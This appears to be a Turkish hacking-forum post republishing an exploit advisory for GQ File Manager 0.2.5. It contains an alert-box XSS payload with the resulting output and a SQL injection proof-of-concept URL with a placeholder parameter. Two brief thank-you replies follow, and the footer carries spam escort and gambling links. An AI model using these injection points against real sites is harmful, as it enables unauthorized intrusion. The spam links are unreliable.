GQ File Manager 0.2.5 Sql Injection / Cross Site Scripting Vulnerabilities

x-Qey

Özel Üye
Katılım
21 Eyl 2012
Mesajlar
1,843
Tepkime puanı
0
Puanları
0
Yaş
31
                # Exploit Title: GQ File Manager - Sql Injection - Cross Site Scripting Vulnerability's
# Date: 19/12/2014
# Url Vendor: http://installatron.com/phpfilemanager
# Vendor Name: GQ File Manager
# Version: 0.2.5
------------------------
+ CROSS SITE SCRIPTING +
------------------------
# Exploiting Description - Created new file example:("xss.html")in the document insert code xss

Input:
"><img src=x onerror=;;alert('XSS') />
Output:
<br />
<b>Warning</b>: fread() [<a href='function.fread'>function.fread</a>]: Length parameter must be greater than 0 in <b>/home/u138790842/public_html/gp/incl/edit.inc.php</b> on line <b>44</b><br />
"><img src=x onerror=alert("xss");>

#P0c
"><img src=x onerror=;;alert('XSS') />

#Proof Concept


------------------------
+ Sql Injection +
------------------------
# Exploiting Description - The Sql Injection in path created a new file.

#P0c
http://site.com/GQFileManager/index.php?&&output=create&create=[sql]

#Proof Concept

# E476A0E9BB4F73FF 1337day.com [2014-12-25] 031DAD097874FD3A #
 

x-Qey

Özel Üye
Katılım
21 Eyl 2012
Mesajlar
1,843
Tepkime puanı
0
Puanları
0
Yaş
31
Teşekkür ederim
 

KingDoz

Forumdan Uzaklaştırıldı
Katılım
23 Haz 2015
Mesajlar
1,403
Tepkime puanı
0
Puanları
0
Yaş
33
Eline saglık kardesim :)
 

sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort mersin escort mersin web tasarım bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol puff Gamdom izmit escort izmit escort
Üst
Copyright® Ajanlar.org 2012